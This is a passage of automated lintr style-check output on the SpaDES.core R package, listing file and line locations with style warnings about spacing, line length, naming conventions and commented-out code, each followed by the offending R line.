after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, 